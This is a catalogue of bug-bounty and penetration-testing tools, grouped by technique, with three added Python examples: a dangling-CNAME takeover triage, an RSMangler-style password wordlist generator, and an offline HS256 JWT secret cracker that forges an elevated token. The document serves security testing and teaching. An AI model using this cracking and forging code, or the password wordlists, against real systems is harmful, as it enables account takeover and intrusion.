
Bug Bounty Tools

This document provides a list of tools related to vulnerability scanning, subdomain takeover, and wordlists/dictionaries. Some of the tools mentioned are Nuclei for configurable targeted scanning, Subjack for subdomain takeover detection and exploitation, and CeWL, cUPP, Crunch, and RSMangler for generating wordlists.

Uploaded by xixiy

Uncategorized
- JSONBee: ready-to-use JSONP endpoints/payloads to help bypass the Content Security Policy (CSP) of different websites.
- CyberChef: the Cyber Swiss Army Knife, a web app for encryption, encoding, compression and data analysis.
- bountyplz: automated security reporting from Markdown templates (HackerOne and Bugcrowd are currently the supported platforms).
- PayloadsAllTheThings: a list of useful payloads and bypasses for web application security and pentest/CTF work.
- bounty-targets-data: hourly-updated data dumps of bug bounty platform scopes (HackerOne, Bugcrowd, Intigriti, etc.) that are eligible for reports.
- android-security-awesome: a collection of Android security related resources.
- awesome-mobile-security: an effort to build a single place for all useful Android and iOS security related material.
- awesome-vulnerable-apps: Awesome Vulnerable Applications, a curated list of deliberately vulnerable apps.
- XFFenum: X-Forwarded-For enumeration against 403 Forbidden responses.

Vulnerability Scanners
- httpx: fast, multi-purpose HTTP toolkit that runs multiple probers using the retryablehttp library; designed to keep results reliable as the thread count increases.
- nuclei: fast, template-driven tool for configurable targeted scanning, offering massive extensibility and ease of use.
- Sn1per: automated pentest framework for offensive security experts.
- metasploit-framework: the Metasploit Framework.
- nikto: web server scanner.
- arachni: web application security scanner framework.
- jaeles: the Swiss Army knife for automated web application testing.
- retire.js: scanner detecting the use of JavaScript libraries with known vulnerabilities.
- Osmedeus: fully automated offensive security framework for reconnaissance and vulnerability scanning.
- getsploit: command line utility for searching and downloading exploits.
- flan: a pretty sweet vulnerability scanner.
- Findsploit: find exploits in local and online databases instantly.
- BlackWidow: Python-based web application scanner that gathers OSINT and fuzzes for OWASP vulnerabilities on a target website.
- backslash-powered-scanner: finds unknown classes of injection vulnerabilities.
- Eagle: multithreaded, plugin-based vulnerability scanner for mass detection of web application vulnerabilities.
- OWASP ZAP: one of the world's most popular free web security tools, actively maintained by a dedicated international team of volunteers.

Subdomain Takeover
- subjack: subdomain takeover tool written in Go.
- Subdomain-takeover: subdomain takeover vulnerability scanner.
- Sub0ver: a powerful subdomain takeover tool.
- autoSubTakeover: checks whether a CNAME resolves to an in-scope address; if it resolves to an address outside the scope, it may be worth checking whether a subdomain takeover is possible.
- NSBrute: Python utility to take over domains vulnerable to AWS NS takeover.
- can-i-take-over-xyz: a list of services and how to claim (sub)domains with dangling DNS records.
- cnames: takes a list of resolved subdomains and outputs any corresponding CNAMEs en masse.
- subHijack: hijacking forgotten and misconfigured subdomains.
- tko-subs: helps detect and take over subdomains with dead DNS records.
- HostileSubBruteforcer: brute-forces existing subdomains and reports whether the third-party host has been set up properly.
- second-order: second-order subdomain takeover scanner.
- takeover: tests subdomain takeover possibilities at mass scale.
- dnsReaper: DNS Reaper is yet another subdomain takeover tool, with an emphasis on accuracy, speed and the number of signatures in its arsenal.

Wordlists
- cewl: CeWL (Custom Word List generator) is a Ruby app which spiders a given URL, up to a specified depth, and returns a list of words that can then be fed to password crackers such as John the Ripper.
- cUPP: CUPP is an automated Python script that interactively asks the user some fundamental questions about the victim (name, company name, partner's name, etc.) and builds a wordlist from the answers.
- crunch: wordlist generator where you specify a standard character set, or any set of characters, to be used in generating the wordlists.
- pydictor: a powerful and useful hacker dictionary builder for brute-force attacks.
- rsmangler: RSMangler takes a wordlist and performs various manipulations on it similar to those done by John the Ripper; the main difference is that it first takes the input words and generates all permutations and the acronym of the words (in the order they appear in the file) before applying the rest of the mangles.
- rockyou.txt: Kali Linux provides this dictionary file as part of its standard installation.
- seclists: SecLists is a collection of multiple types of lists used during security assessments; list types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads and many more.
- wordlists.assetnote.io: Assetnote wordlists.
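The check that autoSubTakeover, cnames and can-i-take-over-xyz describe (CNAME points outside the scope, and the target service answers as if the resource is unclaimed) as an added example. This is not code from any of those tools; DNS answers and HTTP bodies are replaced by constructed tables so it runs offline, and the fingerprint strings in FINGERPRINTS are illustrative assumptions rather than a verified signature set.

```python
"""Dangling-CNAME triage (added example, not code from any listed tool).

For each host: take its CNAME target, discard targets inside the programme
scope, then match the rest against per-service fingerprints (CNAME suffix plus
the error string the service returns for an unclaimed resource).
"""
from dataclasses import dataclass
from typing import Optional

# Constructed sample data standing in for real DNS answers and HTTP bodies.
SAMPLE_CNAMES = {
    "blog.example.com": "example.github.io.",
    "shop.example.com": "shop-example.herokuapp.com.",
    "www.example.com": "lb.example.com.",            # in scope: never a takeover
    "old.example.com": "old-assets.s3.amazonaws.com.",
    "status.example.com": "example.statuspage.io.",  # out of scope, no fingerprint
    "api.example.com": None,                         # A record only, no CNAME
}
SAMPLE_BODIES = {
    "blog.example.com": "There isn't a GitHub Pages site here.",
    "shop.example.com": "No such app",
    "old.example.com": "<Code>NoSuchBucket</Code>",
    "status.example.com": "All systems operational",
}

# service -> (CNAME suffix, unclaimed-resource marker); assumed illustrative values.
FINGERPRINTS = {
    "GitHub Pages": ("github.io", "There isn't a GitHub Pages site here"),
    "Heroku": ("herokuapp.com", "No such app"),
    "AWS S3": ("s3.amazonaws.com", "NoSuchBucket"),
}


@dataclass
class Finding:
    host: str
    cname: str
    service: Optional[str]    # None: out of scope but no known service matched
    takeover_likely: bool     # True only when the unclaimed marker was seen


def in_scope(name: str, scope_suffixes) -> bool:
    """True if `name` is one of the scope apexes or a subdomain of one."""
    n = name.rstrip(".").lower()
    return any(n == s or n.endswith("." + s) for s in scope_suffixes)


def classify(host, cname, body, scope_suffixes) -> Optional[Finding]:
    if cname is None or in_scope(cname, scope_suffixes):
        return None
    target = cname.rstrip(".").lower()
    for service, (suffix, marker) in FINGERPRINTS.items():
        if target == suffix or target.endswith("." + suffix):
            return Finding(host, target, service, marker in (body or ""))
    return Finding(host, target, None, False)


def triage(cnames, bodies, scope_suffixes):
    """Return one Finding per host whose CNAME points outside the scope."""
    results = []
    for host, cname in cnames.items():
        finding = classify(host, cname, bodies.get(host), scope_suffixes)
        if finding is not None:
            results.append(finding)
    return results


if __name__ == "__main__":
    for f in triage(SAMPLE_CNAMES, SAMPLE_BODIES, ["example.com"]):
        flag = "TAKEOVER?" if f.takeover_likely else "review"
        print(f"{flag:9} {f.host} -> {f.cname} ({f.service or 'unknown service'})")
```

Against a live target, walk the whole CNAME chain and test the last name (the `cnames` tool above outputs exactly that set), and remember that NS delegation to a nameserver nobody controls (what NSBrute targets) is a separate check on NS records. A marker match is a lead, not proof: confirm by claiming the resource on the service, within the programme's rules.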
postMessage
- postMessage-tracker: Chrome extension to track postMessage usage (URL, domain and stack), both by logging via CORS and visually as an extension icon.
- PostMessage_Fuzz_Tool: web developer tool for fuzzing postMessage handlers.

Google Cloud Storage
- GCPBucketBrute: script to enumerate Google Storage buckets, determine what access you have to them, and determine whether that access can be escalated.
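The Wordlists entries above describe generators (CeWL, CUPP, Crunch, RSMangler) rather than showing what they produce. The following added example, which is not code from any of those tools, implements the ordering the RSMangler entry gives: every permutation of the input words plus their acronym first, then per-word mangles. The mangle set (case variants, leetspeak, reversal, digit/year/symbol suffixes) and the suffix list are small illustrative subsets chosen here.

```python
"""RSMangler-style wordlist expansion (added example, not RSMangler's code)."""
from itertools import permutations

LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = ("1", "123", "!", "2023", "2024")   # assumed, typical defaults


def permute_and_acronym(words):
    """Join every ordering of every non-empty subset of `words`, then add the acronym."""
    out = []
    for r in range(1, len(words) + 1):
        for combo in permutations(words, r):
            out.append("".join(combo))
    out.append("".join(w[0] for w in words if w))
    return out


def mangle(word):
    """Apply the per-word mangles to one base word; returns a set of variants."""
    bases = {word, word.lower(), word.upper(), word.capitalize(),
             word.lower().translate(LEET), word[::-1]}
    variants = set(bases)
    for base in bases:
        for suffix in SUFFIXES:
            variants.add(base + suffix)
    return variants


def build_wordlist(words, min_len=4, max_len=32):
    """Permutations/acronym first, then mangles; de-duplicated, order preserved."""
    seen, result = set(), []
    for base in permute_and_acronym(words):
        for candidate in sorted(mangle(base)):
            if min_len <= len(candidate) <= max_len and candidate not in seen:
                seen.add(candidate)
                result.append(candidate)
    return result


if __name__ == "__main__":
    # Constructed input: words a CeWL spider of a fictional company site might return.
    for w in build_wordlist(["acme", "secure"]):
        print(w)
```

Output size grows factorially with the number of input words, which is why RSMangler works on short, targeted lists (CeWL or CUPP output) rather than on rockyou.txt; apply the length bounds before piping into John the Ripper or Hydra.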

JSON Web Token
- jwt_tool: toolkit for testing, tweaking and cracking JSON Web Tokens.
- c-jwt-cracker: JWT brute-force cracker written in C.
- jwt-heartbreaker: Burp extension that checks whether a JWT was signed with a key known from public sources.
- jwtear: modular command line tool to parse, create and manipulate JWT tokens for hackers.
- jwt-key-id-injector: simple Python script to check for a hypothetical JWT key ID (kid) injection vulnerability.
- jwt-hack: tool for hacking / security testing of JWTs.
- jwt-cracker: simple HS256 JWT token brute-force cracker.

Digital Ocean
- spaces-finder: a tool to hunt for publicly accessible DigitalOcean Spaces.

Command Injection
- Commix: automated all-in-one OS command injection and exploitation tool.

SQLi
- sqlmap: automatic SQL injection and database takeover tool (https://sqlmap.org).
- Sqliv: massive SQL injection vulnerability scanner.
- Sqlmate: a friend of sqlmap which does what you always expected from sqlmap.
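What jwt-cracker and c-jwt-cracker automate, as an added example that is not code from either tool: an HS256 JWT's signature is HMAC-SHA256 over `header_b64.payload_b64` with the secret as the key, so a weak secret can be recovered from a single captured token without sending anything to the target. The token and wordlist below are constructed sample input (secret "s3cret"); `forge_with` then shows the impact by re-signing a modified payload.

```python
"""Offline HS256 secret recovery (added example, not jwt-cracker's code)."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build a compact JWS the way a server-side library would."""
    enc = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = enc(header) + "." + enc(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def decode_payload(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that reproduces the token's signature, else None."""
    head, body, sig = token.split(".")
    alg = json.loads(b64url_decode(head)).get("alg")
    if alg != "HS256":
        raise ValueError(f"token alg is {alg!r}, not HS256; HMAC brute force does not apply")
    signing_input = f"{head}.{body}".encode()
    target = b64url_decode(sig)
    for cand in candidates:
        mac = hmac.new(cand.encode(), signing_input, hashlib.sha256).digest()
        if mac == target:          # offline comparison; timing is irrelevant here
            return cand
    return None


def forge_with(token: str, secret: str, **claims) -> str:
    """Once the secret is known, re-sign a modified payload (demonstrates impact)."""
    head, body, _ = token.split(".")
    header = json.loads(b64url_decode(head))
    payload = decode_payload(token)
    payload.update(claims)
    return sign_hs256(header, payload, secret.encode())


# Constructed sample input.
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                          {"sub": "1001", "role": "user"}, b"s3cret")
SAMPLE_WORDLIST = ["password", "secret", "jwt", "changeme", "s3cret", "admin"]

if __name__ == "__main__":
    found = crack_hs256(SAMPLE_TOKEN, SAMPLE_WORDLIST)
    print("recovered secret:", found)
    if found:
        print("forged admin token:", forge_with(SAMPLE_TOKEN, found, role="admin"))
```

Feed it rockyou.txt or a SecLists password list for a realistic run; pure Python manages a few hundred thousand HMACs per second, which is why the C implementation exists. Note that this only covers weak-secret HS256; algorithm confusion (RS256 verified as HS256 with the public key) and `alg: none` are separate tests that jwt_tool covers.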


XSS
- XSStrike: most advanced XSS scanner.
- XSS-keylogger: a keystroke logger for exploiting XSS vulnerabilities in a site.

CMS
- wpscan: WPScan is a free (for non-commercial use) black-box WordPress security scanner.
- CMSeek: CMS detection and exploitation suite; scans WordPress, Joomla, Drupal and over 170 other CMSs.
- Droopescan: plugin-based scanner that helps security researchers identify issues with several CMSs, mainly Drupal and SilverStripe.
- Drupwn: Drupal enumeration and exploitation tool.
- WPSpider: centralized dashboard for running and scheduling WordPress scans powered by the wpscan utility.
- wprecon: WordPress recon.
- CMSmap: Python open-source CMS scanner that automates detecting security flaws in the most popular CMSs.
- joomscan: OWASP Joomla Vulnerability Scanner Project.
- pyfiscan: free web application vulnerability and version scanner.

API
- Secretx: extracts API keys and secrets by requesting each URL in your list.

S3 Buckets
- s3brute: S3 brute-force tool.
- S3-bucket-finder: find AWS S3 buckets and extract data.
- bucket-stream: find interesting Amazon S3 buckets by watching certificate transparency logs.
- slurp: enumerate S3 buckets via certstream, domain, or keywords.
- lazys3: Ruby script to brute-force AWS S3 buckets using different permutations.
- cred scanner: simple file-based scanner that looks for potential AWS access and secret keys in files.
- DumpsterDiver: analyzes big volumes of various file types in search of hardcoded secrets such as keys (AWS access key, Azure share key or SSH keys) or passwords.
- S3Scanner: scan for open AWS S3 buckets and dump the contents.
- AWSBucketDump: security tool to look for interesting files in S3 buckets.
- CloudScraper: enumerates targets in search of cloud resources: S3 buckets, Azure Blobs, DigitalOcean Spaces.
- s3viewer: publicly open Amazon AWS S3 bucket viewer.
- festin: S3 bucket weakness discovery.
- s3reverse: converts the various S3 bucket naming formats into one format, for bug bounty and security testing.
- mass-s3-bucket-tester: tests a list of S3 buckets to see whether directory listing is enabled or whether they are writable.
- S3BucketList: Firefox plugin that lists Amazon S3 buckets found in requests.
- dirlstr: finds directory listings or open S3 buckets from a list of URLs.
- Burp-AnonymousCloud: Burp extension that passively identifies cloud buckets and then tests them for public accessibility.
- kicks3: S3 bucket finder from HTML/JS and bucket misconfiguration testing tool.
- 2tearsinabucket: enumerate S3 buckets for a specific target.
- s3_objects_check: white-box evaluation of effective S3 object permissions, to identify publicly accessible files.
- s3tk: a security toolkit for Amazon S3.
- CloudBrute: awesome cloud enumerator.
- s3cario: fetches the CNAME first to see whether it is a valid Amazon S3 bucket and, if not, checks whether the domain itself is a bucket name.
- S3Cruze: all-in-one AWS S3 bucket tool for pentesters.

Inspecting JS Files
- JSParser: Python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files.
- relative-url-extractor: small tool that extracts relative URLs from a file.
- sub.js: gets JavaScript files from a list of URLs or subdomains.
- LinkFinder: Python script that finds endpoints in JavaScript files.

Code Audit
- Cobra: source code security audit.

Crawling
- Crawler: crawl a website and extract links.
- waybackMachine: use Wayback Machine data to pull a list of paths.
- meg: fetch many paths for many hosts, without killing the hosts.
- hakrawler: simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application.
- igoturls: WaybackURLs + OtxURLs + CommonCrawl.

Frameworks
- Sn1per: automated pentest framework for offensive security experts.
- XRay: tool for recon, mapping and OSINT gathering from public networks.
- Datasploit: OSINT framework to perform various recon techniques on companies, people, phone numbers, Bitcoin addresses, etc., aggregate all the raw data, and output it in multiple formats.
- Osmedeus: fully automated offensive security framework for reconnaissance and vulnerability scanning.
- TIDoS-Framework: the offensive manual web application penetration testing framework.
- discover: custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
- lazyrecon: script intended to automate your reconnaissance process in an organized fashion.
- 003Recon: some tools to automate recon, by 003random.
- Vulmap: web vulnerability scanning and verification tool that scans web apps for vulnerabilities and can verify them.

Git
- GitTools: repository with three tools for pwning websites that expose .git repositories.
- gitjacker: leak Git repositories from misconfigured websites.
- git-dumper: dump a Git repository from a website.
- GitHunter: search a Git repository for interesting content.
- dvcs-ripper: rip web-accessible (distributed) version control systems: SVN/Git/Hg.


Secrets
- git-secrets: prevents you from committing secrets and credentials into Git repositories.
- gitleaks: scan Git repos (or files) for secrets using regex and entropy.
- truffleHog: searches Git repositories for high-entropy strings and secrets, digging deep into commit history.
- gitGraber: monitors GitHub in real time to find sensitive data for different online services.
- talisman: hooks into Git's pre-push hook to validate the outgoing changeset for things that look suspicious, such as authorization tokens and private keys.
- GitGot: semi-automated, feedback-driven tool to rapidly search troves of public data on GitHub for sensitive secrets.
- git-all-secrets: captures all Git secrets by leveraging multiple open-source Git searching tools.
- github-search: tools to perform basic searches on GitHub.
- git-vuln-finder: finds potential software vulnerabilities from Git commit messages.
- commit-stream: OSINT tool for finding GitHub repositories by extracting commit logs in real time from the GitHub event API.
- gitrob: reconnaissance tool for GitHub organizations.
- repo-supervisor: scans your code for security misconfiguration and searches for passwords and secrets.
- GitMiner: tool for advanced mining of content on GitHub.
- shhgit: Ah shhgit! Find GitHub secrets in real time.
- detect-secrets: an enterprise-friendly way of detecting and preventing secrets in code.
- rusty-hog: suite of secret scanners built in Rust for performance, based on TruffleHog.
- whispers: identify hardcoded secrets and dangerous behaviours.
- yar: tool for plundering organizations, users and/or repositories.
- dufflebag: search exposed EBS volumes for secrets.
- secret-bridge: monitors GitHub for leaked secrets.
- earlybird: sensitive data detection tool capable of scanning source code repositories for clear-text password violations, PII, outdated cryptography methods, key files and more.
- Trufflehog-Chrome-Extension: TruffleHog as a Chrome extension.

Subdomain Enumeration
- Findomain: the fastest cross-platform subdomain enumerator.
- chaos-client: Go client for the Chaos DNS API.
- domained: multi-tool subdomain enumeration.
- bugcrowd-levelup-subdomain-enumeration: all the material from the talk "Esoteric sub-domain enumeration techniques" given at the Bugcrowd LevelUp 2017 virtual conference.
- shuffledns: wrapper around massdns written in Go that enumerates valid subdomains by active brute force and resolves subdomains with wildcard handling and easy input/output.
- censys-subdomain-finder: subdomain enumeration using the certificate transparency logs from Censys.
- Turbolist3r: subdomain enumeration tool with analysis features for discovered domains.
- censys-enumeration: script to extract subdomains/emails for a given domain using the SSL/TLS certificate dataset on Censys.
- tugarecon: fast subdomain enumeration tool for penetration testers.
- as3nt: Another Subdomain ENumeration Tool.
- Subra: web UI for subdomain enumeration (subfinder).
- Substr3am: passive reconnaissance/enumeration of interesting targets by watching for SSL certificates being issued.
- domain: enumall.py, a setup script for Recon-ng.
- altdns: generates permutations, alterations and mutations of subdomains and then resolves them.
- brutesubs: automation framework for running multiple open-source subdomain brute-forcing tools in parallel, using your own wordlists, via Docker Compose.
- dns-parallel-prober: parallelised domain name prober to find as many subdomains of a given domain as fast as possible.
- dnscan: Python wordlist-based DNS subdomain scanner.
- hakrevdns: small, fast tool for performing reverse DNS lookups en masse.
- dnsx: fast, multi-purpose DNS toolkit for running multiple DNS queries of your choice against a list of user-supplied resolvers.
- crtndstry: yet another subdomain finder.
- VHostScan: virtual host scanner that performs reverse lookups.
- scilla: information gathering tool for DNS / subdomain / port / directory enumeration.
- sub3suite: research-grade suite of tools for subdomain enumeration, intelligence gathering and attack surface mapping.
- Aquatone: a tool for domain flyovers.
- Knockpy: Python tool designed to enumerate subdomains on a target domain through a wordlist.
- subbrute: DNS meta-query spider that enumerates DNS records and subdomains.
- Assetfinder: find domains and subdomains related to a given domain.
- Rsdl: subdomain scan with the ping method.
- Massdns: high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration).
- Subfinder: subdomain discovery tool that finds valid subdomains for websites; designed as a passive framework to be useful for bug bounties and safe for penetration testing.
- Amass: in-depth attack surface mapping and asset discovery.
- Sub.sh: online subdomain detection script.
- Sublist3r: fast subdomain enumeration tool for penetration testers.
- Sudomy: subdomain enumeration tool to collect subdomains and analyze domains, performing automated reconnaissance for bug hunting / pentesting.
- dnsenum: multithreaded Perl script to enumerate DNS information of a domain and to discover non-contiguous IP blocks.

Passwords
- thc-hydra: Hydra is a parallelized login cracker which supports numerous protocols to attack.
- DefaultCreds-cheat-sheet: one place for all the default credentials, to assist blue/red teamers in finding devices with default passwords.
- changeme: a default credential scanner.
- BruteX: automatically brute-force all services running on a target.
- patator: multi-purpose brute-forcer with a modular design and flexible usage.

XXE Injection
- ground-control: collection of scripts that run on the author's web server, mainly for debugging SSRF, blind XSS and XXE vulnerabilities.
- dtd-finder: list DTDs and generate XXE payloads using those local DTDs.
- docem: utility to embed XXE and XSS payloads in docx, odt, pptx, etc. (OXML_XXE on steroids).
- xxeserv: mini web server with FTP support for XXE payloads.
- xxexploiter: tool to help exploit XXE vulnerabilities.
- B-XSSRF: toolkit to detect and keep track of blind XSS, XXE and SSRF.
- XXEinjector: automatic exploitation of XXE vulnerabilities using direct and various out-of-band methods.
- oxml_xxe: embeds XXE/XML exploits into different file types.

XSS Injection
- XSStrike: most advanced XSS scanner.
- xssor2: hack with JavaScript.
- xsscrapy: XSS spider; detects 66/66 wavsep XSS test cases.
- sleepy-puppy: Sleepy Puppy XSS payload management framework.
- ezXSS: easy way for penetration testers and bug bounty hunters to test (blind) cross-site scripting.
- xsshunter: the XSS Hunter service, a portable version of XSSHunter.com.
- dalfox: DalFox (Finder Of XSS), parameter analysis and XSS scanning tool written in Go.
- xsser: Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web applications.
- XSpear: powerful XSS scanning and parameter analysis tool and gem.
- weaponised-XSS-payloads: XSS payloads designed to turn alert(1) into a P1.
- tracy: assists with finding all sinks and sources of a web application and displays the results in a digestible manner.
- ground-control: see XXE Injection above; also used for blind XSS.
- xssValidator: Burp Intruder extender designed for automation and validation of XSS vulnerabilities.
- JSShell: interactive multi-user web JS shell.
- bXSS: utility for bug hunters and organizations to identify blind cross-site scripting.
- docem: see XXE Injection above; also embeds XSS payloads.
- XSS-Radar: detects parameters and fuzzes them for cross-site scripting vulnerabilities.
- BruteXSS: Python tool to find XSS vulnerabilities in web applications.
- findom-xss: fast, simple DOM-based XSS vulnerability scanner.
- domdig: DOM XSS scanner for single page applications.
- femida: automated blind XSS search for Burp Suite.
- B-XSSRF: see XXE Injection above; also tracks blind XSS.
- domxssscanner: DOMXSS Scanner is an online tool to scan source code for DOM-based XSS vulnerabilities.
- xsshunter_client: correlated injection proxy tool for XSS Hunter.
- extended-xss-search: an improved version of the author's xssfinder tool; scans for different types of XSS on a list of URLs.
- xssmap: Python 3 tool to detect XSS vulnerabilities.
- XSSCon: simple XSS scanner tool.
- BitBlinder: Burp Suite extension that injects custom cross-site scripting payloads into every form/request submitted, to detect blind XSS vulnerabilities.
- XSSOauthPersistence: maintaining account persistence via XSS and OAuth.
- shadow-workers: free and open-source C2 and proxy designed for penetration testers to help exploit XSS and malicious Service Workers (SW).
- rexsser: Burp plugin that extracts keywords from responses using regexes and tests for reflected XSS on the target scope.
- xss-flare: XSS hunter on Cloudflare serverless workers.
- Xss-Sql-Fuzz: Burp Suite plugin that automatically adds XSS and SQL payloads to fuzz all GET/POST (GP) parameters (filtering special parameters) with one click.
- vaya-ciego-nen: detect, manage and exploit blind cross-site scripting (XSS) vulnerabilities.
- dom-based-xss-finder: Chrome extension that finds DOM-based XSS vulnerabilities.
- XSSTerminal: develop your own XSS payload using interactive typing.
- xss2png: PNG IDAT chunk XSS payload generator.
- XSSwagger: simple Swagger UI scanner that detects old versions vulnerable to various XSS attacks.

Port Scanning
- masscan: TCP port scanner that spews SYN packets asynchronously; can scan the entire Internet in under 5 minutes.
- RustScan: the modern port scanner.
- naabu: fast port scanner written in Go with a focus on reliability and simplicity.
- nmap: Nmap, the Network Mapper (GitHub mirror of the official SVN repository).
- sandmap: Nmap on steroids; simple CLI with the ability to run the pure Nmap engine, 31 modules with 459 scan profiles.
- ScanCannon: combines the speed of masscan with the reliability and detailed enumeration of nmap.

Screenshots
- EyeWitness: takes screenshots of websites, provides some server header info, and identifies default credentials if possible.
- aquatone: visual inspection of websites across a large number of hosts; convenient for quickly gaining an overview of HTTP-based attack surface.
- screenshoteer: make website screenshots and mobile emulations from the command line.
- gowitness: Go web screenshot utility using headless Chrome.
- WitnessMe: web inventory tool that takes screenshots of web pages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells and whistles to make life easier.
- eyeballer: convolutional neural network for analyzing pentest screenshots.
- scrying: collects RDP, web and VNC screenshots all in one place.
- Depix: recovers passwords from pixelized screenshots.
- httpscreenshot: grabs screenshots and HTML of large numbers of websites.

Technologies
- wappalyzer: identify technology on websites.
- webanalyze: port of Wappalyzer (uncovers technologies used on websites) to automate mass scanning.
- python-builtwith: BuiltWith API client.
- whatweb: next generation web scanner.
- retire.js: scanner detecting the use of JavaScript libraries with known vulnerabilities.
- httpx: fast, multi-purpose HTTP toolkit that runs multiple probers using the retryablehttp library; designed to keep results reliable as the thread count increases.
- fingerprintx: standalone utility for service discovery on open ports that works well with other popular bug bounty command line tools.

Content Discovery
- gobuster: directory/file, DNS and VHost busting tool written in Go.
- Feroxbuster: fast, simple, recursive content discovery tool written in Rust.
- Ffuf: fast web fuzzer written in Go.
- dirsearch: web path scanner.
- recursebuster: rapid content discovery tool for recursively querying web servers; handy in pentesting and web application assessments.
- filebuster, dirstalk, dirbuster-ng: extremely fast and flexible web fuzzers.
- gospider: fast web spider written in Go.
- hakrawler: simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application.
- crawley: fast, feature-rich, Unix-way web scraper/crawler written in Go.

SQL Injection
- sqlmap: automatic SQL injection and database takeover tool.
- NoSQLMap: automated NoSQL database enumeration and web application exploitation tool.
- SQLiScanner: automatic SQL injection with Charles and the sqlmap API.
- SleuthQL: Python 3 Burp history parsing tool to discover potential SQL injection points; to be used in tandem with sqlmap.
- mssqlproxy: toolkit for lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse.
- sqli-hunter: simple HTTP/HTTPS proxy server and sqlmap API wrapper that makes digging for SQLi easy.
- waybackSqliScanner: gathers URLs from the Wayback Machine, then tests each GET parameter for SQL injection.
- ESC: Evil SQL Client, an interactive .NET SQL console client with enhanced SQL Server discovery, access and data exfiltration features.
- mssqli-duet: SQL injection script for MSSQL that extracts domain users.
- burp-to-sqlmap: run SQL injection tests on Burp Suite bulk requests using sqlmap.
- BurpSQLTruncSanner: messy Burp Suite plugin for SQL truncation vulnerabilities.
- andor: blind SQL injection tool written in Go.
- Blinder: Python library to automate time-based blind SQL injection.
- sqliv: massive SQL injection vulnerability scanner.
- nosqli: NoSQL injection CLI tool for finding vulnerable websites using MongoDB.

Links
- LinkFinder: Python script that finds endpoints in JavaScript files.
- JS-Scan: a .js scanner built in PHP, designed to scrape URLs and other info.
- LinksDumper: extract links/possible endpoints from responses and filter them via decoding/sorting.
- GoLinkFinder: fast and minimal JS endpoint extractor.
- BurpJSLinkFinder: Burp extension for passively scanning JS files for endpoint links.
- urlgrab: Go utility to spider through a website searching for additional links.
- waybackurls: fetch all the URLs that the Wayback Machine knows about for a domain.
- getJS: quickly get all JavaScript sources/files.
- linx: reveals invisible links within JavaScript files.

Parameters
- parameth: brute-force discovery of GET and POST parameters.
- param-miner: Burp extension that identifies hidden, unlinked parameters; particularly useful for finding web cache poisoning vulnerabilities.
- ParamPamPam: brute-force discovery of GET and POST parameters.
- Arjun: HTTP parameter discovery suite.
- ParamSpider: mining parameters from dark corners of web archives.


Server Side Request Forgery
- SSRFmap: automatic SSRF fuzzer and exploitation tool.
- Gopherus: generates gopher:// links for exploiting SSRF and gaining RCE in various servers.
- ground-control: collection of scripts that run on the author's web server, mainly for debugging SSRF, blind XSS and XXE vulnerabilities.
- SSRFire: automated SSRF finder; give it the domain name and your callback server and chill. Also has options to find XSS and open redirects.
- httprebind: automatic tool for DNS rebinding-based SSRF attacks.
- ssrf-sheriff: simple SSRF-testing sheriff written in Go.
- B-XSSRF: toolkit to detect and keep track of blind XSS, XXE and SSRF.
- extended-ssrf-search: smart SSRF scanner using different methods such as parameter brute-forcing in POST and GET.
- gaussrf: fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine and Common Crawl, and filters URLs with open redirection or SSRF parameters.
- ssrfDetector: server-side request forgery detector.
- grafana-ssrf: authenticated SSRF in Grafana.
- sentrySSRF: searches for Sentry config on a page or in JavaScript files and checks for blind SSRF.
- lorsrf: brute-forcing hidden parameters to find SSRF vulnerabilities using GET and POST methods.

DNS Rebinding
- singularity: DNS rebinding attack framework.
- whonow: a "malicious" DNS server for executing DNS rebinding attacks on the fly (public instance running on rebind.network:53).
- dns-rebind-toolkit: front-end JavaScript toolkit for creating DNS rebinding attacks.
- dref: DNS rebinding exploitation framework.
- rbndr: simple DNS rebinding service.
- httprebind: automatic tool for DNS rebinding-based SSRF attacks.
- dnsFookup: DNS rebinding toolkit.

Fuzzing
- wfuzz: web application fuzzer.
- ffuf: fast web fuzzer written in Go.
- fuzzdb: dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
- IntruderPayloads: collection of Burp Suite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads, and web pentesting methodologies and checklists.
- fuzz.txt: potentially dangerous files.
- fuzzilli: JavaScript engine fuzzer.
- fuzzapi: tool for REST API pentesting; uses the API_Fuzzer gem.
- vaf: very advanced (web) fuzzer written in Nim.

CRLF Injection
- CRLFsuite: fast tool specially designed to scan for CRLF injection.
- crlfuzz: fast tool to scan for CRLF vulnerabilities, written in Go.
- CRLF-Injection-Scanner: command line tool for testing CRLF injection on a list of domains.
- Injectus: CRLF and open redirect fuzzer.

CSRF Injection
- XSRFProbe: the prime Cross-Site Request Forgery (CSRF) audit and exploitation toolkit.

CORS Misconfiguration
- Corsy: CORS misconfiguration scanner.
- CORStest: simple CORS misconfiguration scanner.
- cors-scanner: multi-threaded scanner that helps identify CORS flaws/misconfigurations.
- CorsMe: Cross-Origin Resource Sharing misconfiguration scanner.
